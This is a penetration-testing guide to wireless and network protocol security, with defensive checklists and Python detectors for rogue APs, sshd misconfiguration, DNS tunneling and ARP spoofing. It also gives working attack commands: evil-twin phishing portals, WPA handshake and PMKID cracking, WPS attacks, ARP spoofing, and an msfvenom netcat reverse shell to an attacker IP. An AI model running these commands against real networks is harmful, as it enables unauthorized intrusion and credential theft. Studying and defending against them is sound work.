This guide covers essential network security concepts, common protocol vulnerabilities, exploitation techniques, and defensive measures that are crucial for penetration testers and security professionals.

Wireless Security

Wireless Penetration Testing

Wireless networks present unique attack vectors that require specialized techniques and tools. This section covers comprehensive wireless security assessment methodologies.

Initial Setup and Enumeration

Interface Configuration:

# Restart NetworkManager if it has left the adapter in a conflicting managed state
sudo service NetworkManager restart

# Put the adapter into monitor mode
sudo airmon-ng start wlx00c0ca978978

# Start Kismet with a session title, using the adapter as the capture source
kismet -t session_name -c wlx00c0ca978978

Network Discovery with Kismet:

# KISMET_COOKIE holds the session cookie obtained after logging in to the Kismet web UI
# List all discovered SSIDs
curl -b "KISMET=$KISMET_COOKIE" -s http://localhost:2501/devices/views/phydot11_accesspoints/devices.json | jq '.[] | ."kismet.device.base.name"' | sort

# Extract comprehensive network information
curl -b "KISMET=$KISMET_COOKIE" -s http://localhost:2501/devices/views/phydot11_accesspoints/devices.json | jq -r '.[] | {
  SSID: ."kismet.device.base.name",
  BSSID: ."kismet.device.base.macaddr",
  Encryption: ."kismet.device.base.crypt",
  Channel: ."kismet.device.base.channel",
  WPS: ."kismet.device.base.wps"
}'

Guest Network Attacks

Captive Portal Exploitation:

# Create an evil twin with a custom captive portal
sudo ./eaphammer -i wlx00c0ca978978 --essid openNetwork -c 4 --auth open --bssid 12:23:34:45:56:67 --captive-portal --portal-template custom_template --lhost 192.168.10.1

WPA/WPA2 PSK Attacks

PMKID Attack:

# Capture the PMKID with eaphammer
sudo ./eaphammer --pmkid -i wlx00c0ca978978 --channel 1 --bssid 30:91:8F:2F:F7:97

# Convert the captured PMKID to hashcat's 22000 format
hcxpcapngtool -o pmkid_hash.22000 capture.pcapng

# Crack with hashcat
hashcat -m 22000 pmkid_hash.22000 wordlist.txt

WPS Attacks:

# Pixie Dust attack
reaver -i wlx00c0ca978978 -b <bssid> -c <channel> -K -N -vv

# Brute-force attack
reaver -i wlx00c0ca978978 -b <bssid> -c <channel> -f -vv

# Null PIN attack
reaver -i wlx00c0ca978978 -b <bssid> -c <channel> -f -N -g 1 -vv -p ''

Handshake Capture and Cracking:

# Monitor the target network on its channel; captures go to handshake_capture-01.cap
sudo airodump-ng -c 1 --bssid <bssid> -w handshake_capture wlx00c0ca978978

# Force a deauthentication so the client reconnects and the 4-way handshake is captured
sudo aireplay-ng --deauth 4 -a <bssid> -c <client_mac> wlx00c0ca978978

# Convert the handshake to the 22000 format (hcxpcaptool is deprecated; hcxpcapngtool replaces it)
hcxpcapngtool -o handshake.22000 handshake_capture-01.cap

# Crack with hashcat
hashcat -m 22000 handshake.22000 rockyou.txt

Evil Twin Attacks

Credential Harvesting:

# Create a fake open network with a phishing captive portal
sudo ./eaphammer -i wlx00c0ca978978 -e fakeSSID -c 4 --auth open --bssid 12:23:34:45:56:67 --captive-portal --portal-template phishing_template

# WPA evil twin for handshake capture
sudo ./eaphammer -i wlx00c0ca978978 -e targetSSID -c 11 --bssid 12:23:34:45:56:67 --creds --auth wpa-psk --wpa-passphrase "randompassword" --wpa-version 2

WPA2 Enterprise Attacks

Certificate Information Gathering:

# Probe for certificate details
sudo wpa_supplicant -c probe_config.conf -D nl80211 -i wlx00c0ca978978 | grep CERT

Evil Twin for Enterprise Networks:

# Create a certificate matching the target network
sudo ./eaphammer --cert-wizard

# Deploy the enterprise evil twin
sudo ./eaphammer -i wlx00c0ca978978 -e enterpriseSSID --bssid 12:23:34:45:56:67 -c 11 --creds --auth wpa-eap --negotiate weakest

Defensive Measures:

  • Implement certificate pinning
  • Use strong EAP methods (EAP-TLS)
  • Monitor for rogue access points
  • Implement network access control (NAC)
  • Regular security assessments
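Implementing the "monitor for rogue access points" item above against the Kismet inventory pulled earlier: the following Python script is an added example, not part of this guide or of Kismet. It reads the devices.json view output (a constructed sample is embedded), compares every BSSID with a hypothetical allowlist of sanctioned APs, and reports evil-twin candidates (a sanctioned SSID served by an unknown BSSID, which is exactly what the eaphammer commands above produce), unknown APs, and open/WEP/TKIP networks. The allowlist, MAC addresses and crypt strings are assumptions.

```python
import json
import sys

# Constructed sample shaped like the Kismet devices.json view queried above
# (only the keys the jq filter extracts; real records carry many more fields).
SAMPLE_DEVICES_JSON = json.dumps([
    {"kismet.device.base.name": "CorpWiFi", "kismet.device.base.macaddr": "AA:BB:CC:00:00:01",
     "kismet.device.base.crypt": "WPA2-PSK AES-CCM", "kismet.device.base.channel": "6"},
    {"kismet.device.base.name": "CorpWiFi", "kismet.device.base.macaddr": "12:23:34:45:56:67",
     "kismet.device.base.crypt": "WPA2-PSK AES-CCM", "kismet.device.base.channel": "11"},
    {"kismet.device.base.name": "Guest", "kismet.device.base.macaddr": "AA:BB:CC:00:00:02",
     "kismet.device.base.crypt": "Open", "kismet.device.base.channel": "1"},
    {"kismet.device.base.name": "Printer-Setup", "kismet.device.base.macaddr": "DE:AD:BE:EF:00:01",
     "kismet.device.base.crypt": "WEP", "kismet.device.base.channel": "11"},
])

# Hypothetical inventory of sanctioned access points: SSID -> authorized BSSIDs.
AUTHORIZED_APS = {
    "CorpWiFi": {"AA:BB:CC:00:00:01"},
    "Guest": {"AA:BB:CC:00:00:02"},
}

# Substrings of Kismet's crypt string that indicate no or broken encryption.
WEAK_CRYPT_MARKERS = ("Open", "WEP", "TKIP")


def parse_devices(devices_json):
    """Reduce Kismet device records to the fields the audit needs."""
    aps = []
    for dev in json.loads(devices_json):
        aps.append({
            "ssid": dev.get("kismet.device.base.name", ""),
            "bssid": dev.get("kismet.device.base.macaddr", "").upper(),
            "crypt": dev.get("kismet.device.base.crypt", ""),
            "channel": str(dev.get("kismet.device.base.channel", "")),
        })
    return aps


def audit(aps, authorized):
    """Flag evil-twin candidates, unknown APs and weak encryption."""
    findings = []
    for ap in aps:
        ssid, bssid, crypt = ap["ssid"], ap["bssid"], ap["crypt"]
        if ssid in authorized and bssid not in authorized[ssid]:
            findings.append({"bssid": bssid, "ssid": ssid,
                             "issue": "evil-twin candidate: sanctioned SSID from an unknown BSSID"})
        elif ssid not in authorized:
            findings.append({"bssid": bssid, "ssid": ssid,
                             "issue": "unknown SSID: rogue or neighbouring AP, locate and verify"})
        if any(marker in crypt for marker in WEAK_CRYPT_MARKERS):
            findings.append({"bssid": bssid, "ssid": ssid,
                             "issue": f"weak or no encryption ({crypt})"})
    return findings


def main():
    # Pipe the curl output from above into this script, or run it alone for the sample.
    data = sys.stdin.read() if not sys.stdin.isatty() else SAMPLE_DEVICES_JSON
    for f in audit(parse_devices(data), AUTHORIZED_APS):
        print(f"{f['bssid']}  {f['ssid']:<16} {f['issue']}")


if __name__ == "__main__":
    main()
```

Run it as `curl -b "KISMET=$KISMET_COOKIE" -s http://localhost:2501/devices/views/phydot11_accesspoints/devices.json | python3 ap_audit.py` after a survey. The allowlist should come from the AP controller or asset inventory, not from a previous scan; a neighbouring building's APs will show up as "unknown SSID", so the finding is a prompt to locate the radio, not proof of compromise.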

Core Network Protocols and Their Vulnerabilities

1. FTP (File Transfer Protocol) - Port 21

Overview:

  • Uses two channels: Command Channel and Data Channel
  • Operates in Active or Passive mode
  • Transmits data in clear text (no encryption)

Common Vulnerabilities:

  • Clear-text transmission: Credentials and data can be intercepted
  • Anonymous access misconfigurations
  • Directory traversal vulnerabilities
  • Bounce attacks (using FTP to scan internal networks)

Exploitation Techniques:

# Connect using telnet to enumerate
telnet <IP> 21

# FTP commands for enumeration
USER anonymous
PASS anonymous@
STAT  # Get server information
SYST  # Get system type
PASV  # Switch to passive mode
LIST  # List files

# Using the ftp client
ftp <IP>

Security Measures:

  • Replace FTP with SFTP or FTPS
  • Disable anonymous access
  • Implement strong authentication
  • Use encryption for sensitive data transfers

2. SSH (Secure Shell) - Port 22

Overview:

  • Encrypted remote access protocol
  • Replaces insecure protocols like Telnet
  • Supports various authentication methods

Common Vulnerabilities:

  • Weak credentials
  • SSH key mismanagement
  • Outdated SSH versions with known vulnerabilities
  • Misconfigured SSH settings

Security Hardening:

  • Disable root login
  • Use key-based authentication
  • Implement fail2ban or similar brute-force protection
  • Keep SSH updated
  • Use non-standard ports (security through obscurity)
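The hardening list above can be checked mechanically. The following Python script is an added example, not part of this guide or of OpenSSH: it parses an sshd_config (two constructed samples are embedded, one with distribution defaults left in place and one hardened) and reports the settings that contradict the list. It models two sshd_config rules that manual review often misses: the first occurrence of a directive wins, and directives after the first Match line are conditional rather than global. The sample contents and the MaxAuthTries threshold of 3 are assumptions.

```python
import re
import sys

# Constructed sshd_config samples, not taken from any real host.
WEAK_CONFIG = """\
# distribution defaults left in place
Port 22
PermitRootLogin yes
PasswordAuthentication yes
PubkeyAuthentication yes
# sshd keeps the FIRST value of a directive, so this later line changes nothing
PermitRootLogin no
MaxAuthTries 6
Match User backup
    PasswordAuthentication yes
"""

HARDENED_CONFIG = """\
Port 2222
PermitRootLogin no
PasswordAuthentication no
PubkeyAuthentication yes
MaxAuthTries 3
"""

# "Keyword value" or "Keyword=value"; sshd keywords are plain letters
DIRECTIVE_RE = re.compile(r"^([A-Za-z]+)\s*=?\s*(.*)$")


def parse_global(config_text):
    """Effective global directives as lower-cased keyword -> value."""
    directives = {}
    for raw in config_text.splitlines():
        line = raw.strip()
        if not line or line.startswith("#"):
            continue
        m = DIRECTIVE_RE.match(line)
        if not m:
            continue
        keyword, value = m.group(1).lower(), m.group(2).strip()
        if keyword == "match":
            break  # everything from here on is conditional, not global
        directives.setdefault(keyword, value)  # first occurrence wins
    return directives


def audit(config_text):
    """Return findings against the hardening points listed above."""
    d = parse_global(config_text)
    findings = []
    # OpenSSH's default is prohibit-password, which still permits root with a key
    root = d.get("permitrootlogin", "prohibit-password").lower()
    if root != "no":
        findings.append(f"PermitRootLogin is '{root}'; set it to 'no'")
    if d.get("passwordauthentication", "yes").lower() != "no":
        findings.append("PasswordAuthentication is enabled; move to keys and set it to 'no'")
    if d.get("pubkeyauthentication", "yes").lower() != "yes":
        findings.append("PubkeyAuthentication is disabled")
    try:
        tries = int(d.get("maxauthtries", "6"))
    except ValueError:
        tries = 6
    if tries > 3:
        findings.append(f"MaxAuthTries is {tries}; lower it to 3 to slow brute forcing")
    return findings


def main():
    # python3 sshd_audit.py /etc/ssh/sshd_config  (audits the weak sample without an argument)
    text = open(sys.argv[1]).read() if len(sys.argv) > 1 else WEAK_CONFIG
    for finding in audit(text) or ["no findings"]:
        print(finding)


if __name__ == "__main__":
    main()
```

The script reads the file as written; the authoritative view of what sshd actually enforces, after defaults, Include files and Match evaluation, is `sshd -T`, whose output (one lower-cased keyword per line) the same `audit()` function accepts unchanged.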

3. Telnet - Port 23

Overview:

  • Legacy remote access protocol
  • Transmits everything in clear text
  • No built-in security features

Vulnerabilities:

  • Clear-text credentials: Easy to intercept with packet sniffing
  • No encryption: All commands and data visible
  • Session hijacking: Easy to perform MITM attacks

Exploitation Example:

# Watch for ICMP on the VPN interface to confirm command execution
sudo tcpdump -i tun0 icmp

# From the telnet session: .RUN ping <attacker-ip> -c 1

# Set up a listener
nc -lvp <port>

# Generate a reverse shell payload
msfvenom -p cmd/unix/reverse_netcat lhost=<IP> lport=<port>

Mitigation:

  • Never use Telnet in production
  • Replace with SSH immediately
  • If legacy systems require it, isolate them completely

4. SMB (Server Message Block) - Ports 139/445

Overview:

  • Network file sharing protocol
  • Used for shared access to files, printers, and serial ports
  • Runs over NetBIOS (port 139) or directly over TCP (port 445)

Common Vulnerabilities:

  • EternalBlue (MS17-010)
  • Null session enumeration
  • Pass-the-hash attacks
  • SMB relay attacks

Enumeration and Exploitation:

# Enumerate SMB shares
enum4linux <IP>
smbclient -L //<IP>/ -N

# Connect to a share
smbclient //<IP>/<SHARE> -U <user>

# Check for vulnerabilities (quote the glob so the shell does not expand it)
nmap --script "smb-vuln*" -p 139,445 <IP>

Defense Strategies:

  • Disable SMBv1
  • Implement SMB signing
  • Use strong authentication
  • Restrict access with firewalls
  • Regular patching

5. RDP (Remote Desktop Protocol) - Port 3389

Overview:

  • Microsoft’s proprietary remote desktop protocol
  • Provides graphical remote access to Windows systems
  • Often exposed to the internet

Common Attack Vectors:

  • BlueKeep (CVE-2019-0708)
  • Brute force attacks
  • Man-in-the-middle attacks
  • Session hijacking

Security Measures:

  • Use Network Level Authentication (NLA)
  • Implement account lockout policies
  • Use VPN for RDP access
  • Enable RDP only when needed
  • Keep systems patched

6. NFS (Network File System) - Port 2049

Overview:

  • UNIX/Linux file sharing protocol
  • Allows remote file system mounting
  • Uses RPC for communication

Vulnerabilities:

  • Misconfigured exports
  • No authentication by default
  • UID/GID manipulation

Exploitation:

# Enumerate NFS exports
showmount -e <IP>

# Mount the NFS share
mkdir /tmp/mount
sudo mount -t nfs -o nolock <IP>:<share> /tmp/mount

# Exploit misconfigured permissions:
# create SUID binaries if write access is available

7. DNS (Domain Name System) - Port 53

Overview:

  • Translates domain names to IP addresses
  • Critical infrastructure component
  • Uses both TCP and UDP

Common Attacks:

  • DNS zone transfers
  • DNS cache poisoning
  • DNS tunneling
  • DNS amplification DDoS
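DNS tunneling, from the list above, is usually found on the resolver rather than on the wire: a tunnel encodes data in long, high-entropy leftmost labels under one base domain and often rides on TXT or NULL records. The following Python script is an added example, not part of this guide or of any DNS product. It parses a constructed query log, profiles each base domain by label length, Shannon entropy and TXT share, and flags domains that trip two of the three heuristics. The log format, thresholds and domain names are assumptions; real resolver logs need their own line parser.

```python
import math
from collections import defaultdict

# Constructed resolver log, one query per line: "<time> <client> <qname> <qtype>".
# Real logs (BIND querylog, dnsmasq, Windows DNS) need their own line parser;
# the names and addresses below are made up.
SAMPLE_QUERY_LOG = """\
2024-01-01T10:00:00 10.0.0.5 www.example.com A
2024-01-01T10:00:01 10.0.0.5 mail.example.com MX
2024-01-01T10:00:02 10.0.0.5 api.example.com A
2024-01-01T10:00:03 10.0.0.7 9c3e7a1f5b2d8e4c6a0f3b7d1e9c5a2f8b4d6e0c.t.tunnel-example.net TXT
2024-01-01T10:00:03 10.0.0.7 4f8b2d6e0a3c7e1f9b5d8a2c6e0f4b7d1a9c3e5b.t.tunnel-example.net TXT
2024-01-01T10:00:04 10.0.0.7 7d1a9c3e5b0f4b2d6e8a2c6e0f3c7e1f9b5d4f8b.t.tunnel-example.net TXT
2024-01-01T10:00:04 10.0.0.7 2c6e0f4b7d1a9c3e5b8a4f8b2d6e0a3c7e1f9b5d.t.tunnel-example.net TXT
"""

# Thresholds (assumed): hostnames are rarely 30+ characters of near-random text,
# and bulk TXT/NULL lookups are a common tunnel transport. Tune per environment.
MIN_QUERIES = 3
LONG_LABEL = 30
HIGH_ENTROPY = 3.0
TXT_FRACTION = 0.5


def shannon_entropy(s):
    """Bits per character of s (at most 4.0 for a hex alphabet)."""
    if not s:
        return 0.0
    counts = defaultdict(int)
    for ch in s:
        counts[ch] += 1
    n = len(s)
    return -sum(c / n * math.log2(c / n) for c in counts.values())


def base_domain(qname):
    """Naive registrable domain: the last two labels. A public-suffix list is
    needed to handle co.uk-style suffixes correctly."""
    labels = qname.rstrip(".").split(".")
    return ".".join(labels[-2:])


def parse_log(text):
    records = []
    for line in text.splitlines():
        parts = line.split()
        if len(parts) != 4:
            continue  # malformed line: skip rather than crash
        ts, client, qname, qtype = parts
        records.append((ts, client, qname.lower(), qtype.upper()))
    return records


def profile_domains(records):
    """Per base domain: volume, label length, entropy, TXT share and a verdict."""
    groups = defaultdict(list)
    for _, _, qname, qtype in records:
        groups[base_domain(qname)].append((qname, qtype))
    stats = {}
    for domain, items in groups.items():
        first_labels = [q.split(".")[0] for q, _ in items]
        avg_len = sum(len(lab) for lab in first_labels) / len(first_labels)
        avg_ent = sum(shannon_entropy(lab) for lab in first_labels) / len(first_labels)
        txt_frac = sum(t in ("TXT", "NULL") for _, t in items) / len(items)
        unique = len({q for q, _ in items})
        score = (avg_len >= LONG_LABEL) + (avg_ent >= HIGH_ENTROPY) + (txt_frac >= TXT_FRACTION)
        stats[domain] = {
            "queries": len(items), "unique_names": unique,
            "avg_label_len": round(avg_len, 1), "avg_entropy": round(avg_ent, 2),
            "txt_fraction": round(txt_frac, 2), "score": score,
            "suspicious": unique >= MIN_QUERIES and score >= 2,
        }
    return stats


def main():
    for domain, s in sorted(profile_domains(parse_log(SAMPLE_QUERY_LOG)).items()):
        flag = "SUSPICIOUS" if s["suspicious"] else "ok"
        print(f"{domain:<22} q={s['queries']} uniq={s['unique_names']} "
              f"len={s['avg_label_len']} H={s['avg_entropy']} txt={s['txt_fraction']} {flag}")


if __name__ == "__main__":
    main()
```

Requiring several unique names per domain keeps one-off long CNAMEs (CDNs, anti-spam lookups) from tripping the rule; those legitimate services are the main source of false positives and belong on an allowlist before the verdict is acted on.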

Enumeration Techniques:

# Brute-force subdomains from a wordlist
for sub in $(cat list.txt); do host "$sub.domain.com"; done

# Reverse DNS lookup over a range
for ip in $(seq 200 254); do host 192.168.1.$ip; done | grep -v "not found"

# DNS recon tools
dnsrecon -d domain.com -t std
dnsenum domain.com

8. Email Protocols

SMTP (Simple Mail Transfer Protocol) - Port 25

Vulnerabilities:

  • Clear-text transmission
  • Open relay misconfiguration
  • User enumeration via VRFY/EXPN commands

Exploitation:

# Connect and enumerate
telnet <IP> 25
HELO hostname
MAIL FROM: test@test.com
RCPT TO: user@target.com
DATA
Subject: Test
Message body
.

POP3 - Port 110 / IMAP - Port 143

Characteristics:

  • POP3: Downloads and removes emails from server
  • IMAP: Synchronizes emails across devices
  • Both transmit in clear text by default

Security Considerations:

  • Use SSL/TLS versions (POP3S: 995, IMAPS: 993)
  • Implement strong authentication
  • Monitor for brute force attempts

Network Attack Techniques

1. Man-in-the-Middle (MITM) Attacks

ARP Poisoning/Spoofing

How it works:

  • Attacker sends forged ARP messages
  • Associates attacker’s MAC with legitimate IP addresses
  • All traffic flows through attacker’s machine

Execution:

# Enable IP forwarding (run as root: with sudo the redirection itself would still run unprivileged)
echo 1 > /proc/sys/net/ipv4/ip_forward

# Perform ARP spoofing between the victim and the gateway
arpspoof -i eth0 -t <victim> -r <gateway>

# Capture traffic with Wireshark
Defense:

  • Static ARP entries for critical systems
  • Dynamic ARP inspection on switches
  • Network segmentation
  • Encrypted protocols (HTTPS, SSH)
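The defenses above can be backed by host-level detection of the attack as described. The following Python script is an added example, not part of this guide or of any ARP-monitoring tool: it parses ARP replies from `tcpdump -i eth0 -n -l arp` output (a constructed sample is embedded), alerts when an IP's MAC binding changes or contradicts a static entry for a critical system, and alerts when one MAC starts answering for several IPs, which is the signature left by the `arpspoof -t <victim> -r <gateway>` invocation above. The addresses, static table and tcpdump sample are assumptions.

```python
import re
import sys
from collections import defaultdict

# Constructed sample of "tcpdump -i eth0 -n -l arp" output; addresses are made up.
SAMPLE_TCPDUMP = """\
10:00:01.000100 ARP, Reply 192.168.1.1 is-at aa:aa:aa:aa:aa:01, length 28
10:00:02.000200 ARP, Request who-has 192.168.1.1 tell 192.168.1.50, length 28
10:00:02.000300 ARP, Reply 192.168.1.50 is-at bb:bb:bb:bb:bb:50, length 28
10:00:03.000400 ARP, Reply 192.168.1.60 is-at cc:cc:cc:cc:cc:60, length 28
10:05:00.000500 ARP, Reply 192.168.1.1 is-at ee:ee:ee:ee:ee:99, length 28
10:05:00.000600 ARP, Reply 192.168.1.50 is-at ee:ee:ee:ee:ee:99, length 28
"""

# Static bindings for critical systems (hypothetical values), the same data a
# "static ARP entries" policy would maintain.
STATIC_ARP = {"192.168.1.1": "aa:aa:aa:aa:aa:01"}

REPLY_RE = re.compile(r"^(\S+)\s+ARP, Reply (\S+) is-at ([0-9a-fA-F:]{17})")


def parse_replies(text):
    """Extract (timestamp, ip, mac) from ARP replies; requests are ignored."""
    replies = []
    for line in text.splitlines():
        m = REPLY_RE.match(line)
        if m:
            replies.append((m.group(1), m.group(2), m.group(3).lower()))
    return replies


def detect_arp_spoofing(replies, static=STATIC_ARP):
    """Alert on bindings that change or contradict the static table, and on
    one MAC answering for several IPs (the arpspoof -t/-r pattern)."""
    seen = {}                      # ip -> last MAC that answered for it
    ips_by_mac = defaultdict(set)  # mac -> every IP it has claimed
    alerts = []
    for ts, ip, mac in replies:
        if ip in static and static[ip] != mac:
            alerts.append({"time": ts, "severity": "high", "ip": ip, "mac": mac,
                           "reason": f"contradicts static entry {static[ip]}"})
        elif ip in seen and seen[ip] != mac:
            alerts.append({"time": ts, "severity": "medium", "ip": ip, "mac": mac,
                           "reason": f"binding changed from {seen[ip]}"})
        seen[ip] = mac
        ips_by_mac[mac].add(ip)
        if len(ips_by_mac[mac]) > 1:
            alerts.append({"time": ts, "severity": "medium", "ip": ip, "mac": mac,
                           "reason": "one MAC answers for " + ", ".join(sorted(ips_by_mac[mac]))})
    return alerts


def main():
    # sudo tcpdump -i eth0 -n -l arp | python3 arp_monitor.py   (sample data without a pipe)
    text = sys.stdin.read() if not sys.stdin.isatty() else SAMPLE_TCPDUMP
    for a in detect_arp_spoofing(parse_replies(text)):
        print(f"{a['time']} [{a['severity']}] {a['ip']} -> {a['mac']}: {a['reason']}")


if __name__ == "__main__":
    main()
```

Binding changes also happen legitimately when DHCP reassigns an address or a NIC is replaced, so the medium-severity alerts need the lease history for context; the contradiction with a static entry for the gateway is the one that justifies immediate isolation.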

2. Network Segmentation and Isolation

Best Practices:

  • Implement VLANs for different security zones
  • Use firewalls between network segments
  • Deploy DMZ for public-facing services
  • Isolate critical infrastructure
  • Implement zero-trust architecture

3. Firewall Bypass Techniques

Common Methods:

  • Protocol tunneling (DNS, HTTP)
  • Fragmentation attacks
  • Source routing exploitation
  • Application-layer bypass
  • IPv6 tunneling in IPv4 networks

Defense:

  • Deep packet inspection
  • Application-aware firewalls
  • Regular rule audits
  • Egress filtering
  • Intrusion Prevention Systems (IPS)

4. VPN Security

Common Issues:

  • Weak encryption algorithms
  • Pre-shared key vulnerabilities
  • Split tunneling risks
  • DNS leaks
  • Outdated VPN protocols

Security Recommendations:

  • Use strong encryption (AES-256)
  • Implement certificate-based authentication
  • Disable split tunneling
  • Regular security audits
  • Keep VPN software updated

5. Wireless Security

Common Vulnerabilities:

  • WEP encryption (completely broken)
  • WPA/WPA2 with weak passwords
  • WPS PIN vulnerabilities
  • Rogue access points
  • Evil twin attacks

Best Practices:

  • Use WPA3 where possible
  • Strong, unique passwords
  • Disable WPS
  • Regular monitoring for rogue APs
  • Enterprise authentication (802.1X)

Defense-in-Depth Strategy

1. Network Monitoring

  • Implement IDS/IPS systems
  • Network flow analysis
  • SIEM integration
  • Regular vulnerability scanning
  • Penetration testing

2. Access Control

  • Principle of least privilege
  • Network Access Control (NAC)
  • Strong authentication mechanisms
  • Regular access reviews
  • Segmentation and micro-segmentation

3. Encryption

  • Use encrypted protocols (HTTPS, SSH, SFTP)
  • VPN for remote access
  • Encrypt data at rest and in transit
  • Certificate management
  • Key rotation policies

4. Incident Response

  • Prepared response procedures
  • Network forensics capabilities
  • Isolation procedures
  • Communication plans
  • Regular drills and updates

Conclusion

Network security requires a comprehensive approach combining:

  • Understanding of protocol vulnerabilities
  • Implementation of security controls
  • Regular monitoring and testing
  • Continuous improvement
  • User education and awareness

Remember that security is not a one-time implementation but an ongoing process that requires constant vigilance and adaptation to new threats.